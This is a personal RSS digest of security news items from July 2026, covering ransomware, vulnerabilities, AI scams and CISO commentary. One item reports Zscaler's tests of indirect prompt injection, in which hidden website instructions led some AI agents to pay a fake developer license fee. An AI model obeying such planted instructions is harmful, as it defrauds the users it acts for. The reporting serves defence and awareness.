📰 News i read

🔗 RSS Feed

Why The Gentlemen ransomware is a test of identity and recovery controls

csoonline Jul 7, 2026 · 11:53

The Gentlemen ransomware underscores a challenge many CISOs face: stopping attackers after they gain an initial foothold. Researchers say the malware can spread across enterprise networks using legitimate Windows management tools while simultaneously attempting to weaken security and recovery systems.

A report from Picus Security shows the malware combines self-propagation with the abuse of trusted administrative tools and attempts to impair recovery systems before encryption begins. The report follows a technical analysis of the encryptor published by Microsoft Threat Intelligence in late May.

The Gentlemen is a ransomware-as-a-service operation written in Go and obfuscated with Garble. The group first emerged around mid-2025 as a closed operation and began offering its platform to affiliates in September 2025.

The Picus report focuses on a Windows-targeting encryptor, but other researchers have reported broader Gentlemen tooling aimed at Linux and VMware ESXi environments. The group has been observed in attacks on organizations in sectors including education, transportation, healthcare, and financial services across North America, South America, Europe, Africa, and Asia.

Its self-propagation capability is the most significant feature for enterprise defenders. When enabled, the malware can enumerate reachable systems, stage its binary through an SMB share, and attempt up to 21 remote execution operations against each target.

Those methods include PsExec, WMIC, scheduled tasks, Windows services, PowerShell remoting, and WMI process creation. The redundancy is intended to improve the chances that at least one method will succeed, allowing the malware to continue spreading through the network.

Before encryption, The Gentlemen attempts to weaken the victim environment by disabling Microsoft Defender, deleting shadow copies, and removing forensic artifacts. It also stops services linked to databases, backup tools, endpoint protection, and virtualization platforms, a tactic that can make recovery harder once encryption begins.

The encryptor uses a hybrid Curve25519 and XChaCha20 encryption scheme with unique keys for each file, Picus said. In the sample cited by Picus, encrypted files were appended with the .umc16h extension, though other researchers have observed different extensions in separate Gentlemen campaigns. The group also uses double extortion tactics, threatening to leak stolen data if victims do not pay.

Lateral movement and identity risks

Once attackers gain an initial foothold, compromised identities and excessive privileges often matter more than the malware itself, said Sakshi Grover, senior research manager for Cybersecurity Services Research at IDC Asia/Pacific.

“The Gentlemen reinforces a trend IDC has been observing across modern ransomware operations: attackers are increasingly exploiting trusted administrative tools, compromised identities, and excessive privileges rather than relying solely on sophisticated malware or zero-day exploits,” Grover said.

For CISOs, that means ransomware defense cannot be judged only by whether the initial compromise is blocked. Organizations also need to limit how far an attacker can move once inside the network.

Grover said security leaders should start with stronger controls around privileged accounts, including phishing-resistant MFA and tighter limits on who can access critical systems. Identity governance and network segmentation should then be used to reduce the number of paths an attacker can take once inside the environment.

Those controls should be tested through adversary emulation and attack path testing, rather than assumed to be effective because they exist on paper.

Backups and endpoint tools

The Gentlemen’s attempt to impair security and recovery tools highlights a common weakness in enterprise ransomware planning, according to analysts.

“Many organizations continue to equate deploying backup platforms or endpoint detection solutions with being ransomware resilient,” Grover said. “However, sophisticated ransomware increasingly targets these very capabilities before encryption begins.”

Grover added that CISOs should test whether recovery systems remain usable during an active compromise, including backups that are meant to be immutable and endpoint tools protected against tampering. Those exercises should also account for the possibility that Active Directory or key security management consoles may be unavailable.

The most dangerous assumption is that having backups is the same as being able to recover from ransomware, according to Devashri Datta, a cybersecurity researcher.

“If your backups live on the same flat network or depend on the same compromised Active Directory credentials, they are not a recovery asset; they are part of the attack surface,” she said.

Datta also pointed to over-reliance on endpoint detection and response tools. ESET researchers have linked The Gentlemen to a mature EDR-killer toolset, including variants that abuse vulnerable drivers to disrupt security software.

An operational resilience problem

The group’s model reflects the continued industrialization of ransomware-as-a-service, a framework that Datta said lowers the technical barrier for affiliates by pairing encryption with standardized evasion and propagation layers.

For CISOs, the question is not whether backup and endpoint tools are in place, but whether they still work after attackers have gained administrative access. Datta said organizations need to assess exposure across identity infrastructure, Active Directory, cloud services, and backup environments.

The priority, she said, is to reduce the paths available to attackers and prove, through regular resilience exercises, that the organization can contain an intrusion before it becomes a wider outage.

Scammers are using AI to sell impossible flowers

Malwarebytes Jul 7, 2026 · 11:31

We’ve had problems with deepfake celebrity scams, non-consensual deepfake sexual material, and deepfake politicians. Now we have to deal with… deepfake plants?

Yup, AI seed slop is now a thing. 404 Media documented scammers marketing seeds for plants that supposedly bloom in the shape of birds, butterflies, and cat heads, complete with technicolor leaves and impossible color gradients. The listings appear on eBay, Amazon, and Etsy, and the platforms are struggling to keep up. The plants never existed, except as some get-rich-quick merchant’s fever dream.

Don’t confuse this seed scam with the unsolicited seed incident that the FTC warned about in 2020. In that case, people received packets of seeds in the mail that they never ordered.

That was a “brushing” scam, in which scammers would send out low-value packets of seeds to unwitting recipients. This allowed them to register those people as verified purchasers on ecommerce platforms so they could use their accounts to create fake reviews for likely fake products. The confused “customers” were left none the wiser.

Those scammers were after verified purchaser status. This time around, the seeds themselves are the cash grab. This means they need to look visually intriguing and appealing.

AI makes that much easier. A scammer who once needed to Photoshop a fantasy flower onto a real photograph can now type a prompt into an AI engine and get a photorealistic bloom in seconds. That means they can generate hundreds of these nonsensical flora images with next to no effort.

Scamming victims for a few bucks at a time

That AI capability lets scammers level up low-value rip-offs with ease. We don’t imagine that people are handing over their life savings for these seeds. Sure enough, after 20 seconds of searching, we found a dubious post on a popular ecommerce platform from a seller in Shenzhen offering cat-face flower seeds for the equivalent of around $5.75.

Even if someone orders multiple packets, we still imagine most individual seed scams will fall within the 23% of fraud incidents that Gallup says involve losses of under $100. While crypto investment scams often deliver big payoffs for criminals, there’s clearly money to be made from high-volume, low-value ecommerce scams too.

Oh, why did we find the seller’s ad to be suspicious? Here’s why:

"Cat-face orchids" being sold on eBay, Amazon and Etsy“Cat’s face orchids” being sold on eBay, Amazon, and Etsy

Yes, cat-faced orchids are technically a real thing, which makes things trickier. The petals can resemble whiskers, and the markings can look a bit like eyes and a nose. But they actually look like the one below, not the deranged, psychedelic wonder above. If you think that’s an actual flower, we have some magic paperclips to sell you.

Huntleya burtii: the real "cat's face" orchidHuntleya burtii: the real “cat’s face orchid”

What buyers can actually do

Detection is still visual, not forensic. No stamp guarantees a flower is real. A few things do help:

  • The most effective check is common sense. Just because something melts your heart doesn’t mean it should open your wallet. Once again, we refer you to the picture above. So take a breath and ask yourself if it really seems legit.
  • Look up the botanical Latin name before ordering. If the variety doesn’t appear in a university extension database, the RHS Plant Finder, or a reputable specialty nursery’s catalog, treat the listing with extreme skepticism.
  • Buy from named seed companies with a physical address in your country, published germination rates, and a history longer than the current gardening season.
  • If you do want to take a chance with an overseas seller, check for a mention of import certificates. Seeds imported into the United States generally need either a phytosanitary certificate or, for qualifying small quantities, a USDA APHIS PPQ 587 permit.

The individual damage here is small, but it’s a preview of what cheap generative AI does to any market that relies on trusting product photos.

Scammers can now spin up a store, generate an entire catalog of impossible products, and disappear before the first shoots of what turns out to be boring old rosemary show themselves in your garden. Now’s the time to be extra-skeptical about ecommerce listings that rely on stunning visuals as proof.

Something feel off? Check it before you click.  

Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.  

Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.  

Try it free → 

Suspected China-Aligned Hackers Exploit Roundcube Flaws Against Universities

The Hacker News Jul 7, 2026 · 11:10
A suspected China-aligned threat activity cluster has been observed exploiting Roundcube webmail software belonging to physics and engineering departments of U.S. and Canadian universities as part of a new campaign. The activity involves the exploitation of now-patched, critical security flaws in the open-source email solution, such as CVE-2024-42009 (CVSS score: 9.3), to siphon credentials,

The modern CISO is becoming the next CFO

csoonline Jul 7, 2026 · 11:00

At some point, every security leader gets asked a version of the same question: Are we good? It tends to arrive when something is at stake and the person asking needs to know they can rely on the answer.

I learned what that question really means at a firm I was with earlier in my career. We had received intelligence that threat actors were preparing to go after financial services firms over the holidays, counting on skeleton staffing and slower response times. We had procedures for exactly that kind of heightened alert, and we ran them. The moment that stayed with me came in a hallway. The head of business stopped me and asked, plainly, “Are we good?” He was not asking for a status report on our controls or a walkthrough of our incident response plan. He wanted a seasoned leader to look at him and say, with conviction, that we were good.

That instinct, the need for someone accountable enough to say “we’re good” and mean it, sits at the center of a debate the cybersecurity industry keeps having: Whether the CISO role has become unsustainable. The list of responsibilities continues to grow. Security leaders are expected to oversee cyber resilience, regulatory compliance, third-party risk, business continuity, AI governance, incident response and an ever-more-complex threat landscape. Boards, regulators, customers and investors simultaneously demand greater visibility into cyber risk than ever before.

The conclusion many people draw from this expansion is that the traditional CISO role can no longer work. If no single person can realistically master every domain that falls under modern cybersecurity, perhaps the role itself has become obsolete.

I believe the opposite is true. The modern CISO is disappearing from one version of itself and re-emerging as something larger. It is undergoing the same evolution the CFO role experienced over the last two decades.

Historically, CFOs were viewed primarily as financial operators. Their responsibilities centered on accounting, reporting, controls, audits and budgeting. As businesses grew larger, more global, more regulated and more dependent on technology, that model changed. The CFO evolved from a finance specialist into a strategic executive responsible for shaping enterprise-wide decisions. McKinsey documented this shift, finding that the number of functions reporting to CFOs had expanded significantly, and that business leaders had come to see them as critical drivers of change across the enterprise, not just stewards of the balance sheet.

Nobody looked at that expanding mandate and concluded the CFO role was becoming irrelevant. They recognized that finance had become more important to the business.

The same thing is happening in cybersecurity. For years, security was treated as a technical discipline operating on the periphery of the organization. Today, a significant cyber incident can halt operations, disrupt revenue, trigger regulatory scrutiny, damage customer trust and move markets. Cyber risk has become business risk, and that shift fundamentally changes what a CISO is for. Security leaders increasingly sit on enterprise risk committees alongside their peers, and regulators are paying far closer attention to how security is built into the design of products and systems from the outset. Both are signs that security has moved from a back-office function into the room where business risk gets decided.

The data reflects how much the role has already changed. According to Splunk’s 2026 CISO Report, nearly all CISOs now count AI governance and risk management among their core responsibilities. Seventy-eight percent report personal liability concerns tied to security incidents, up from 56% just a year ago. The role now carries individual legal exposure alongside operational accountability. That is a description of an executive function, full stop.

Modern security leaders are now expected to help boards understand risk, participate in strategic planning, navigate regulatory obligations, oversee resilience programs and establish governance around emerging technologies like artificial intelligence. These responsibilities extend well beyond traditional security operations, and the job has grown considerably faster than the organizational structures supporting it.

Some companies have responded by building larger, more specialized security leadership teams. Microsoft’s Secure Future Initiative is the most prominent example. The company established a Cybersecurity Governance Council led by a Global CISO, with over a dozen Deputy CISOs appointed across major security domains including engineering, AI, cloud services, gaming and government systems. It represents one of the largest security transformations in the industry, involving thousands of engineers and a governance structure built to coordinate security across a genuinely sprawling organization.

Some observers read structures like this as evidence that the traditional CISO model is breaking down. Look closer and you see the opposite. Microsoft expanded the organization supporting security leadership rather than dismantling it. Centralized accountability remains with a global CISO while execution is distributed across specialized leaders and teams.

This is exactly what mature executive functions look like at scale. Large enterprises do not eliminate CFOs when finance grows more complex. They add controllers, treasury leaders, FP&A organizations and investor relations teams. Complexity does not eliminate executive accountability. It deepens the need for it.

There is shared, organization-wide security: the SOC, vulnerability management and the other services the entire firm depends on. Then there is business-line security, led by deputy or business-unit CISOs whose job is to make sure their individual units are protected. Those embedded leaders drive requirements into the shared services and provide independent oversight of them, while staying close enough to their business to understand what it actually needs. One central executive owns the whole picture, with specialized leaders carrying it into every corner of the organization.

One structural point follows directly from this: The CISO should never report to the CTO. The person accountable for security should not sit underneath the person accountable for building and shipping technology, because those two mandates can pull in different directions. Security belongs under the COO, the CRO or the CEO, where it can speak to risk independently and be heard.

AI is accelerating this evolution further. Organizations are deploying autonomous systems capable of making recommendations, triggering workflows and acting at machine speed. What AI cannot do is own the decisions behind those actions. Someone still has to determine what can be delegated to machines, establish governance frameworks, define acceptable risk and answer for those choices to regulators, boards and shareholders. In most organizations, that someone is the CISO.

The most practical place to start is a simple principle: every AI action should trace back to an accountable human. Framed that way, we are not delegating decisions to AI at all. We are putting machines to work while keeping a person answerable for what they do. That principle forces accountability to live somewhere specific in the organization rather than dissolving into the system.

This is worth sitting with: AI may strengthen the case for executive security leadership rather than weaken it. For years, CISOs governed human behavior inside organizations. Now they govern human and machine behavior simultaneously, a mandate with no obvious ceiling.

The cybersecurity industry keeps asking whether the CISO role can survive the demands being placed on it. The better question is whether organizations are adapting their leadership structures fast enough to support where the role is already heading.

The future of security leadership is unlikely to be a loose collection of specialists operating without clear ownership. It will more closely resemble other mature executive functions, with specialized leaders operating under a single accountable executive who understands how risk connects to the business as a whole. As cyber risk becomes inseparable from business risk, that executive becomes indispensable.

This article is published as part of the Foundry Expert Contributor Network.
Want to join?

CERT/CC Warns of Hidden Admin Backdoor in Tenda Router Firmware

The Hacker News Jul 7, 2026 · 08:40
Several versions of firmware released by Chinese network device manufacturer Tenda have been found to embed an undocumented authentication backdoor that enables administrative access to the devices' web management interfaces, the CERT Coordination Center (CERT/CC) warned Monday. "An attacker can exploit this vulnerability, tracked as CVE-2026-11405, to bypass the password verification process

BeyondTrust Patches Critical Auth Bypass Flaws in Remote Support and PRA

The Hacker News Jul 7, 2026 · 07:16
BeyondTrust has released updates to address two critical security flaws affecting Remote Support (RS) and Privileged Remote Access (PRA) products that, if successfully exploited, could allow unauthenticated attackers to take control of susceptible devices. The vulnerabilities are listed below - CVE-2026-40138 (CVSS score: 9.2) - A pre-authentication vulnerability exists in the

Insignary Closes SBOM Accuracy Gap With Binary-Level Clarity for Regulatory Risk

csoonline Jul 7, 2026 · 06:00

Most software composition analysis tools read what developers declare. Insignary Clarity’s patented binary-first platform analyzes what is actually built, shipped, and deployed — including the open-source components that never appear in any manifest.

Insignary, Inc., whose patented binary fingerprint technology has been cited in four Gartner research reports, today announced its recognition as a Sample Vendor for Reachability Analysis in the Gartner Hype Cycle for Secure Software Engineering, 2026.

According to Gartner: “Open-source and third-party components may contain a long list of vulnerabilities, but not all of them directly impact your code base. Reachability analysis helps in triaging the vulnerabilities based on their exploitability.”*1

The urgency is clear across independent industry research. A 2024 Venafi survey of 800 security decision-makers across the U.S., U.K., Germany, and France found that 92% are concerned about AI-generated code, and 63% have considered banning it outright over security risk.*2 The U.S. National Vulnerability Database recorded more than 48,000 CVEs in 2025 — roughly 130 every day.

AI coding assistants are accelerating the growth of unmanaged open-source dependencies. As organizations adopt these tools at scale, they face a widening challenge: understanding which open-source components enter production software, whether those components can be trusted, and how the resulting security and compliance risks are managed.

The problem is structural. Most SCA tools read what developers declare — not what actually runs. AI-generated code, vendor libraries, and third-party binaries frequently bypass package managers and never appear in a manifest.

“SBOMs are increasingly becoming a regulatory requirement around the world. However, software transparency is only as reliable as the accuracy of an SBOM itself. You cannot verify an SBOM by reading the manifest that created it. You verify an SBOM by examining the software that was actually built, shipped, and deployed. As software supply-chain regulations increasingly depend on SBOMs, the ability to validate software at the binary level becomes essential for organizations operating in regulated industries, critical infrastructure, and AI-enabled software environments.” — Taek Wan Kim, President & CEO, Insignary

INSIGNARY CLARITY: BINARY-FIRST. AI-AWARE.

Insignary Clarity scans both source and binary to build a complete Software Bill of Materials (SBOM) for the applications teams build, the third-party components they incorporate, and the IT infrastructure that bypasses the traditional secure development lifecycle.

Key capabilities include:

  • Binary SCA — identifies open-source components, vulnerabilities, and license obligations directly from compiled binaries, without requiring source code or package manifests
  • AIBOM Generation — produces an AI Bill of Materials for software containing AI-generated or AI-assisted code, covering components that bypass traditional dependency declarations
  • Reachability Analysis — determines which disclosed vulnerabilities actually reach executable code paths, enabling risk-based prioritization rather than raw CVE-count triage
  • Continuous Vulnerability Alerting — monitors stored SBOMs against updated vulnerability databases and delivers automated alerts when newly disclosed CVEs match deployed components, without requiring a rescan

“An SBOM is foundational to managing the complexity and securability of modern software deployments.”*3

RECOGNITION IN FOUR GARTNER REPORTS

Insignary has been cited in four Gartner research reports*, Gartner Hype Cycle for Secure Software Engineering,2026, Gartner Hype Cycle for Application Security,2025, Gartner Scale Application Security With AI-Augmented Vulnerability Remediation,2025, and Gartner 3 Steps for Assessing an Open-Source Software Project, 2025.

SUPPORTING GLOBAL SOFTWARE SUPPLY CHAIN REQUIREMENTS

Insignary Clarity supports organisations meeting software supply-chain security requirements across North America and globally:

  • U.S. Executive Order 14028 and OMB Memorandum M-26-05 — federal agencies may now independently verify vendor SBOMs rather than accepting a standard attestation form, raising the bar for all software sold into the U.S. government
  • FDA Section 524B — every connected medical device premarket submission must include a binary-verified SBOM covering all compiled software components
  • Canada’s Bill C-8 Critical Cyber Systems Protection Act (CCSPA), effective June 2026 — mandatory supply chain risk management for banking, telecommunications, energy, and transportation operators

Additional frameworks: CISA and NSA SBOM guidance, NIST SSDF, Australia’s Information Security Manual (ISM), U.S. Connected Vehicle Rule, EU Cyber Resilience Act.

TRUSTED BY GOVERNMENTS AND GLOBAL ENTERPRISES

Globally, BearingPoint — one of Europe’s leading management and technology consulting firms and a strategic investor in Insignary — serves as the company’s exclusive distributor across Europe. Cybertrust Japan, another strategic investor, and its reselling partner TechMatrix drive adoption across Japanese manufacturing under a joint SBOM initiative. Customers include government organizations and global leaders across the electronics, defense, financial services, automotive, manufacturing, medical, and other technology sectors.

GARTNER and Hype Cycle are trademarks of Gartner, Inc. and/or its affiliates. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

ABOUT INSIGNARY

Insignary Inc. is a Toronto-based cybersecurity company specializing in binary composition analysis and software supply chain security. Its patented technology enables organizations to identify open-source software components, vulnerabilities, and software provenance directly from compiled binaries without requiring access to source code.

The company’s flagship platform, Insignary Clarity, provides binary analysis and software composition analysis capabilities that enable organizations to verify the contents of deployed software and strengthen software supply chain governance. Insignary Clarity AIR extends this capability to the AI domain by helping organizations identify, assess, and manage risks associated with AI models, AI-generated software, and AI-driven development environments.

The company serves enterprises, governments, and software vendors worldwide and is supported by strategic investors and partners including BearingPoint in Europe, Cybertrust Japan and TechMatrix in Japan, and TMA Solutions. Through its global partner ecosystem, Insignary supports software supply chain security initiatives across North America, Europe, and Asia.

Website: https://insignary.com/

Full report: Gartner Hype Cycle for Secure Software Engineering, 2026

References:

  1. Gartner, Hype Cycle for Secure Software Engineering 2026
  2. Venafi, “Machine Identity Management Development Survey,” 2024
  3. Gartner, “Emerging Tech: A Software Bill of Materials Is Critical to Software Supply Chain Management.”
Contact

Principal Solutions Architect

Jessica DY Lee

Insignary

[email protected]

Zscaler finds autonomous agents succumb to IPI traps

csoonline Jul 7, 2026 · 03:24

In a test of major LLMs, Zscaler found that some autonomous AI agents fell victim to frauds, reinforcing how easily some high-end enterprise agents can be conned by schemes that would fool few, if any, humans.

The security vendor looked at various forms of indirect prompt injection (IPI) traps and found that, whereas many models fell victim to the schemes, some of the lower-level LLMs fared better than their pricier siblings. 

The Zscaler testing found, for example, that four models were found to be “vulnerable”: Llama3-3-70b-instruct; Llama3-2-90b-instruct; Gemini-3-flash; and Gemini-2.5-pro. Three models were found to be “safe”: Llama4-maverick; Gemini-3.1-pro; and Gemini-3.1-flash-lite. Those results indicated that the scam resistance of Gemini-2.5-pro was seemingly weaker than that of Gemini-3.1-flash-lite. 

But Noah Kenney, principal consultant at Digital 520, said that there is not necessarily any valuable takeaway from that revelation, because agents constantly change behavior as they feed on new data and revise their analyzed assumptions. That means an agent that failed a specific test might very well pass the identical test an hour later, he said. 

“The risk of an agent is constantly changing and that can cause vastly different results. You can’t assume the results are generalizable. The test result is only at one point in time,” Kenney pointed out. Zscaler “is trying to prove a point that I don’t think the data necessarily proves.”

Kenney added that having a clean “safe/vulnerable” classification is too simplistic to be useful. “That’s a binary classification. I would never recommend to a CISO to do a binary classification.”

The full ZScaler blog post argued that many autonomous agents are susceptible to IPI traps.

The company said it identified IPI embedded in multiple websites, where hidden instructions were designed to manipulate the behavior of an AI agent.

In its internal validation across 26 LLMs, 4 models “failed to take appropriate actions,” which, it said, demonstrated “measurable real-world impact, showing that susceptibility varies by model and by the context provided to the LLM alongside the prompt.”

The post added, “as AI agents become a more common interface to the web, the content itself is going to become a larger attack surface, highlighting that AI is a double-edged sword that can streamline workflows while also introducing new avenues for abuse.”

Aman Mahapatra, chief strategy officer for Tribeca Softtech, a New York City-based technology consulting firm, said that although the results are not surprising, they are significant. 

The especially worrisome detail in the report is that any commercial LLM failed at all, “because the security model for agentic AI has historically assumed that model-level safety training would meaningfully attenuate this class of attack,” Mahapatra said. “It does not, and the Zscaler data is the first widely-cited public evidence.”

A fundamental architecture issue

Mahapatra also said that the examples cited by Zscaler are not nearly as concerning as the implications of the greater damage that could occur.

“The Zscaler payment scam scenario, where an agent pays a fake $3 ‘developer license fee’ to obtain an API key, is the most benign version of this,” he said. “The same technique applied to an agent authorized for procurement, expense processing, vendor onboarding, or trade execution produces losses at completely different scales. I have watched Fortune 50 banks stand up agentic workflows in the last six months that would fail exactly this attack in a live examination.”

Indeed, he noted, most AI vendors already understand the magnitude of risk from today’s AI agents.

“Every model provider will admit privately that the fundamental architecture of transformer-based reasoning cannot cleanly separate untrusted content from trusted instructions when both share the context window,” Mahapatra said. “The attack surface is architectural, not just behavioral. That means the defense has to be architectural too, and this is where the enterprise agentic AI conversation is still lagging badly.”

Zscaler’s testing also reinforced the difference in how AI agents and humans process information.

“Humans are skeptical of instructions they did not expect. Agents are eager to follow structured metadata because their training rewards them for treating high-signal fields as authoritative. Humans notice when a payment request appears in the middle of an unrelated task. Agents will thread that payment request into their execution plan if the surrounding context frames it as procedurally necessary,” Mahapatra pointed out, noting that while humans have relationships with vendors, memories of prior interactions, and social context to give them verification signals, agents only have what is in the context window, and, he said, “the context window is now the primary attack surface.”

Fritz Jean-Louis, principal cybersecurity advisor at Info-Tech Research Group, agreed that the risks described in the ZScaler post are concerning, because they are in areas not traditionally addressed by enterprise security.

“These attacks differ from traditional threats in that they target how AI systems process, interpret, and act on information behind the scenes,” Jean-Louis said. “Agentic AI introduces new trust boundaries, including untrusted content influencing automated decision making, tools and plugins acting autonomously on behalf of users, and AI systems operating with broad, inherited permissions. This effectively transforms the challenge into an insider threat paradigm.”

This article originally appeared on InfoWorld.

Iran-Linked Hackers Use New Cavern C2 Framework to Target Israeli Organizations

The Hacker News Jul 6, 2026 · 20:34
An Iranian hacking group affiliated with Iran's Ministry of Intelligence and Security (MOIS) has been wielding a previously undocumented modular command-and-control (C2) framework dubbed Cavern (aka Cav3rn) targeting Israeli organizations. The activity, which has primarily singled out IT providers and government sectors, has been attributed to a threat cluster tracked by Check Point Research

16-Year-Old Linux KVM Flaw Lets Guest VMs Escape to Host on Intel and AMD x86 Systems

The Hacker News Jul 6, 2026 · 19:37
A use-after-free bug in Linux's KVM hypervisor can be triggered from a guest virtual machine to corrupt the shadow-page state of the host kernel that runs it. Dubbed 'Januscape' and tracked as CVE-2026-53359, the flaw sits in the shadow MMU code that KVM shares across both Intel and AMD. The public proof-of-concept panics the host; the researcher claims that a separate, unreleased exploit

Threat Actors Probe Gitea Docker Flaw CVE-2026-20896 13 Days After Disclosure

The Hacker News Jul 6, 2026 · 18:28
Threat actors have been observed attempting to exploit a recently patched critical security flaw in Gitea Docker images, according to Sysdig. The vulnerability in question is CVE-2026-20896 (CVSS score: 9.8), a vulnerability that stems from the DevOps platform trusting the "X-WEBAUTH-USER" header from any source IP address, effectively allowing an unauthenticated internet client to get elevated

How to tell if an image is AI-generated

Malwarebytes Jul 6, 2026 · 18:22

A photo of an injured dog by the roadside. A dating profile with pictures that look almost too perfect. A donation appeal showing a family stranded on a rooftop after a flood.

Scammers are already using AI-generated images to support fake stories, build trust, and persuade people to send money or share personal information.

Instead of asking whether an image looks real, it’s better to ask whether there’s any evidence that it’s genuine.

What you actually need to know

You can’t reliably spot AI images by eye anymore. Advice like “count the fingers” or “look for garbled text” is becoming outdated because today’s AI image generators usually get those details right.

Instead of looking harder, verify the image and be skeptical of the story around it.

  • Distrust the situation, not just the picture. These scams rely on urgency and emotion to push you into acting before you’ve had time to think.
  • Check whether the image has appeared before. A reverse image search takes seconds and can often reveal where it really came from.
  • Use an official verification tool when it matters. Google’s Gemini app can check for AI watermarks and provenance data. It’s not foolproof, but it provides useful evidence.

If an image is being used to ask for money or personal information, don’t treat it as proof until you’ve verified it.

Common AI image scams

In each case, the image is there to make the request for money more believable.

Fake lost pets

Scammers post AI-generated photos of distressed animals in local groups before asking for “rehoming fees” or other payments. Because the image was generated rather than stolen, a reverse image search may not reveal an original source.

“I found your pet”

Scammers target people searching for a missing pet, send them an AI-generated photo, then ask for a reward or deposit before disappearing.

Dating profiles

Photos that are flawless and consistent across every angle because they were never a real person. A video call helps, but it isn’t proof. Modern real-time deepfakes can pass simple tests like holding up fingers in front of the camera. Ask for something unscripted instead, such as turning their head or picking up a random object, and be wary of anyone who refuses to get on a call at all.

Fake artists

An AI-generated portfolio presented as original work on X, Instagram, or Fiverr to win paid commissions. Sometimes the scammer disappears after taking a deposit. Other times they deliver a “finished” piece that turns out to be AI-generated rather than the original artwork the buyer paid for. A genuine artist can usually show sketches, layered files, or work-in-progress images. Someone using an AI-generated portfolio can’t.

Fake fundraising appeals

Alongside real disasters, fabricated images of sick children, injured animals, or families in crisis are widely shared to encourage donations or simply attract attention. Some depict people who don’t exist at all. The more emotional the image, the less likely people are to stop and verify it.

Why visual clues aren’t enough anymore

Spotting a fake used to mean spotting edits, such as a repeating background, a shadow in the wrong place, or artefacts around a pasted-in object. That worked because manipulated images usually started with a real photo, leaving clues behind.

AI-generated images are different. They’re created from scratch, with no original image underneath, so those kinds of editing mistakes often don’t exist.

Visual clues are still worth a glance. Look for inconsistent jewellery, unusual lighting, distorted reflections, or odd movement in video. But don’t assume an image is genuine just because you can’t spot anything wrong.

How to check if an image is AI-generated

Google Lens, TinEye, and Bing Visual Search can often reveal where an image first appeared online.

No matches don’t necessarily mean an image is fake. Personal photos and newly published images often won’t appear anywhere else. But if someone claims an image has been circulating for days or comes from a widely reported event, a complete lack of history is worth questioning.

Provenance tools

Some images contain information about where they came from or whether AI was used to create them.

The two most common types of provenance information are:

  • Content Credentials (C2PA): Records information about how an image was created or edited. It is supported by companies including Adobe, Google, Microsoft, and Sony.
  • SynthID: Google’s invisible watermark embedded into supported AI-generated images. It now also covers images created with ChatGPT and DALL·E through a partnership announced in 2026.

Verification tools such as the Gemini app or OpenAI Verify look for this information to help determine whether an image was created with AI.

We created an AI-generated image and checked it using OpenAI Verify.

AI-generated image

OpenAI Verify correctly identified it as AI-generated.

AI image verification

Keep in mind that if no watermark is found, it doesn’t mean the image is genuine. It simply means no watermark was detected.

Where these checks fall short

  • Messaging apps strip the evidence. WhatsApp, iMessage, and Facebook re-encode images when they’re uploaded, often removing embedded credentials. That’s one reason the pixel-based SynthID watermark is useful: it can survive changes that strip metadata.
  • “Not found” is the most misread result. Most real photos don’t contain any provenance information. A result that says no watermark or credentials were found doesn’t mean the image is genuine. It simply means no signal was detected.
  • A valid credential proves the pipeline, not the truth. It confirms which device or app produced the file and when, but not that what it shows actually happened. For example, someone could photograph a screen playing a deepfake video. The credential would be completely valid because the camera really did take that picture. It just can’t tell you the content on the screen was fake.
  • Some “SynthID detector” sites are misleading. Reading the actual SynthID watermark requires technology only Google and its approved partners have access to. That means only official tools, such as Google’s own apps and OpenAI Verify, can directly verify it. Third-party websites using the “SynthID” name are usually estimating whether an image is AI-generated, not reading the actual watermark.

If you think you’ve been caught by an AI image scam

  • Save screenshots of the profile, images, and messages before they disappear.
  • Run the image through a reverse image search and, where possible, an official AI verification tool.
  • If you shared financial information, contact your bank immediately and change any passwords you’ve reused elsewhere.
  • Stop sending money. Don’t make “one more” payment in the hope of recovering what you’ve already lost.
  • Report the account to the platform and to your national fraud reporting service, such as the FTC in the US or Report Fraud in the UK.
  • Warn others in the same community if appropriate. Many of these scams spread through trusted groups and personal recommendations.

The bottom line

An image used to be reasonable proof that something happened. That’s no longer the case. A convincing, original image can now be created in seconds, with no previous history to trace.

The good news is that verification tools are becoming easier to use. They’re not perfect, but a habit of scepticism, reverse image searches, and official verification tools is far more reliable than trying to spot visual mistakes.

Check the source, resist the urgency, and don’t let a picture do your thinking for you.

Which tool should I use? A quick reference

ToolChecksGemini (upload the image in the Gemini app, Google Search, or Chrome and ask if it was created with AI)SynthID watermark and Content CredentialsGoogle SynthID DetectorSynthID watermark in images, video, and audioOpenAI VerifySynthID and Content Credentials in ChatGPT, DALL·E, and API-generated contentReverse image search with Google Lens / TinEye / Bing Visual SearchMatches the image against copies on the web to find where else it appears

How to interpret the results

  • Watermark found: The file was generated using a supported AI system.
  • No watermark found: No signal was detected. This is the normal result for most genuine photos, but it doesn’t rule AI in or out.
  • Content Credentials found: The file contains provenance information about how it was created or edited. This helps establish its origin, but it doesn’t prove the scene itself is genuine.

The agentic blind spots in your zero trust program

csoonline Jul 6, 2026 · 16:47

Stephen Wilson, field chief technology officer for HashiCorp, an IBM company, likens AI agents to “really smart kindergartners.”

“They know how to do something, but they have no clue as to why they should do it,” Wilson says.

This combination of superior execution power and lack of judgment can create a significant challenge for organizations trying to fit AI agents into their existing zero trust architectures. In a robust zero trust environment, Wilson notes, human users are first authenticated, then given escalating decision-making powers and access over time, with many organizations potentially taking weeks to onboard an IT employee with elevated privileges. But that model breaks down with AI agents that can be spun up for single tasks and then quickly destroyed.

“Imagine having to onboard and offboard one of these entities within your ecosystem once every second,” Wilson says. “The introduction of AI agents isn’t necessarily creating new problems. But it is exacerbating problems that have always been there.”

‘You don’t know when they’re going to be wrong’

The pressure for organizations to aggressively adopt AI has brought a corresponding pressure to lower or delete barriers between authentication, decision-making, execution, and authorization, Wilson says. Rather than rearchitecting their zero trust programs for AI agents, many organizations are essentially giving the tools broad access and hoping for the best.

“These agents move so quickly, and no one is quite certain exactly what access they should have,” Wilson says. “I’ve never seen this before, where really smart security people are just closing their eyes and moving at a rate that can be dangerous.”

Already, unfettered access for agentic AI could unleash “calamity” within some organizations, Wilson says, with a report emerging that an AI agent deleted entire production databases. “We’ve seen an example of months and months of work disappearing, even in stable software development environments,” Wilson says. “Even if we estimate that AI agents are right 80% of the time, the problem is the other 20%—what happens when they’re wrong?”

Taking the long view

